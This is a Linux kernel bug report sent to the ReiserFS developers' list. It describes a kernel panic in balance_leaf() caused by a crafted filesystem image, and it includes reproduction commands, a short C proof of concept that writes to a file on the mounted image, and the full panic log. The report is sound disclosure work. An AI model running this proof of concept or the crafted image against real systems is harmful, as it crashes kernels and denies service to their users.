https://bugzilla.kernel.org/show_bug.cgi?id=200337 Bug ID: 200337 Summary: Kernel panic in balance_leaf() when writing file in reiserfs file system Product: File System Version: 2.5 Kernel Version: 4.18 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ReiserFS Assignee: reiserfs-devel@xxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 276991 --> https://bugzilla.kernel.org/attachment.cgi?id=276991&action=edit The (compressed) crafted image which causes crash - Reproduce (4.18) # mkdir mnt # mount -t reiserfs -o acl,user_xattr 212.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); // open / write / read int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777); if (fd >= 0) { write(fd, (char *)buf, 517); write(fd, (char *)buf, sizeof(buf)); } } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 279.746296] REISERFS (device loop0): found reiserfs format "3.6" with standard journal [ 279.746393] REISERFS (device loop0): using ordered data mode [ 279.746399] reiserfs: using flush barriers [ 279.748793] REISERFS (device loop0): journal params: device loop0, size 8192, journal first block 18, max trans len 1024, max batch 900, max commit age 30, max trans age 30 [ 279.749734] REISERFS (device loop0): checking transaction log (loop0) [ 280.576711] REISERFS (device loop0): Using r5 hash to sort names [ 287.069428] REISERFS panic (device loop0): vs-12195 balance_leaf: CFR not initialized [ 287.069498] ------------[ cut here ]------------ [ 287.069502] kernel BUG at fs/reiserfs/prints.c:369! [ 287.077174] invalid opcode: 0000 [#1] SMP KASAN PTI [ 287.078336] CPU: 0 PID: 1425 Comm: a.out Not tainted 4.18.0-rc1+ #8 [ 287.079609] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 287.081574] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 287.082547] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 287.086363] RSP: 0018:ffff8801effeee40 EFLAGS: 00010282 [ 287.087434] RAX: 0000000000000049 RBX: ffffffffa6939e80 RCX: 0000000000000000 [ 287.088866] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003dffddbe [ 287.090308] RBP: ffff8801effeeef0 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 287.091740] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801df059100 [ 287.093173] R13: ffffffffa693a080 R14: 0000000000000000 R15: ffff8801eb1e2a80 [ 287.094624] FS: 00007f9138c40700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 287.096244] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.097400] CR2: 00007f91386f1760 CR3: 00000001ef0ae000 CR4: 00000000000006f0 [ 287.098852] Call Trace: [ 287.099374] ? reiserfs_debug+0x10/0x10 [ 287.100169] ? leaf_paste_in_buffer+0x2c1/0x3a0 [ 287.101100] balance_leaf+0x4749/0x4800 [ 287.101919] ? wake_bit_function+0x90/0x90 [ 287.102795] ? kasan_check_read+0x11/0x20 [ 287.103616] ? get_neighbors+0x20e/0x450 [ 287.104423] ? replace_key+0xf0/0xf0 [ 287.105160] do_balance+0x219/0x430 [ 287.105880] ? do_balance+0x219/0x430 [ 287.106649] ? get_right_neighbor_position+0x80/0x80 [ 287.107661] ? create_virtual_node+0x9d0/0x9d0 [ 287.108571] ? memset+0x31/0x40 [ 287.109222] reiserfs_paste_into_item+0x35d/0x3b0 [ 287.110197] ? reiserfs_delete_object+0xd0/0xd0 [ 287.111130] ? __kmalloc+0x11f/0x240 [ 287.111865] ? reiserfs_get_block+0x89d/0x1c40 [ 287.112769] reiserfs_get_block+0x9a6/0x1c40 [ 287.113641] ? reiserfs_commit_write+0x390/0x390 [ 287.114592] ? __asan_loadN+0xf/0x20 [ 287.115362] ? number+0x427/0x5d0 [ 287.116053] ? kasan_check_read+0x11/0x20 [ 287.116888] ? node_page_state+0x2f/0x50 [ 287.117698] ? replace_slot+0x111/0x130 [ 287.118500] ? kasan_unpoison_shadow+0x36/0x50 [ 287.119411] ? kasan_kmalloc+0xad/0xe0 [ 287.120194] ? memcg_kmem_put_cache+0x1b/0xa0 [ 287.121089] ? kmem_cache_alloc+0x17c/0x1e0 [ 287.121959] ? kasan_check_write+0x14/0x20 [ 287.122817] ? create_empty_buffers+0x17e/0x1d0 [ 287.123747] __block_write_begin_int+0x296/0x940 [ 287.124689] ? reiserfs_commit_write+0x390/0x390 [ 287.125631] ? __block_write_begin_int+0x296/0x940 [ 287.126621] ? reiserfs_commit_write+0x390/0x390 [ 287.127567] ? __breadahead+0xd0/0xd0 [ 287.128323] ? reiserfs_wait_on_write_block+0xa6/0x140 [ 287.129368] ? reiserfs_allow_writes+0x50/0x50 [ 287.130309] ? pagecache_get_page+0xca/0x2f0 [ 287.131191] ? wait_for_stable_page+0x77/0xf0 [ 287.132083] __block_write_begin+0x11/0x20 [ 287.132921] reiserfs_write_begin+0x1a5/0x380 [ 287.133824] ? timespec64_trunc+0x5c/0x90 [ 287.134659] generic_perform_write+0x192/0x320 [ 287.135567] ? __bpf_trace_filemap_set_wb_err+0x10/0x10 [ 287.136627] ? file_update_time+0x1d2/0x270 [ 287.137482] ? current_time+0x110/0x110 [ 287.138282] ? save_stack+0xb5/0xd0 [ 287.139000] __generic_file_write_iter+0x261/0x2e0 [ 287.139991] ? do_syscall_64+0x78/0x170 [ 287.140784] generic_file_write_iter+0x19d/0x2d0 [ 287.141736] __vfs_write+0x286/0x410 [ 287.142488] ? kernel_read+0xa0/0xa0 [ 287.143251] ? common_file_perm+0x11b/0x2e0 [ 287.144109] ? may_open_dev+0x50/0x50 [ 287.144864] ? apparmor_task_setrlimit+0x270/0x270 [ 287.145839] ? fsnotify+0x590/0x7d0 [ 287.146569] ? rw_verify_area+0x78/0x140 [ 287.147370] vfs_write+0xf9/0x260 [ 287.148054] ksys_write+0xb4/0x140 [ 287.148755] ? __ia32_sys_read+0x50/0x50 [ 287.149563] ? vm_brk+0x20/0x20 [ 287.150227] __x64_sys_write+0x43/0x50 [ 287.150996] do_syscall_64+0x78/0x170 [ 287.151762] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 287.152797] RIP: 0033:0x7f91387522c0 [ 287.153529] Code: 73 01 c3 48 8b 0d d8 cb 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d 89 24 2d 00 00 75 10 b8 01 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 fe dd 01 00 48 89 04 24 [ 287.157321] RSP: 002b:00007ffca08cac68 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 287.158846] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f91387522c0 [ 287.160273] RDX: 0000000000000205 RSI: 00000000006010a0 RDI: 0000000000000003 [ 287.161697] RBP: 00007ffca08caca0 R08: 00000000007bc010 R09: 0000000000000000 [ 287.163135] R10: 000000000000086f R11: 0000000000000246 R12: 00000000004006e0 [ 287.164561] R13: 00007ffca08cada0 R14: 0000000000000000 R15: 0000000000000000 [ 287.166005] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea sysfillrect sysimgblt fb_sys_fops ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 287.181052] ---[ end trace 2e85051acb5f6dc1 ]--- [ 287.182112] RIP: 0010:__reiserfs_panic+0xe2/0x130 [ 287.183057] Code: 48 89 da 48 c7 c1 20 11 94 a6 74 47 49 8d b4 24 d8 03 00 00 49 c7 c1 e0 21 9a a7 4d 89 e8 48 c7 c7 c0 12 94 a6 e8 62 a4 c7 ff <0f> 0b 48 85 db 48 89 de 48 c7 c2 20 11 94 a6 74 24 49 c7 c0 e0 21 [ 287.187017] RSP: 0018:ffff8801effeee40 EFLAGS: 00010282 [ 287.188128] RAX: 0000000000000049 RBX: ffffffffa6939e80 RCX: 0000000000000000 [ 287.189564] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003dffddbe [ 287.191001] RBP: ffff8801effeeef0 R08: ffffed003edc4f21 R09: ffffed003edc4f21 [ 287.192464] R10: 0000000000000003 R11: ffffed003edc4f20 R12: ffff8801df059100 [ 287.193892] R13: ffffffffa693a080 R14: 0000000000000000 R15: ffff8801eb1e2a80 [ 287.195338] FS: 00007f9138c40700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000 [ 287.196992] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 287.198162] CR2: 00007f91386f1760 CR3: 00000001ef0ae000 CR4: 00000000000006f0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/reiserfs/do_balan.c#L1450 if (tb->CFL[0]) { if (!tb->CFR[0]) reiserfs_panic(tb->tb_sb, "vs-12195", "CFR not initialized"); Reported by Wen Xu (wen.xu@xxxxxxxxxx) from SSLab at Gatech. -- You are receiving this mail because: You are the assignee for the bug.-- To unsubscribe from this list: send the line "unsubscribe reiserfs-devel" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html
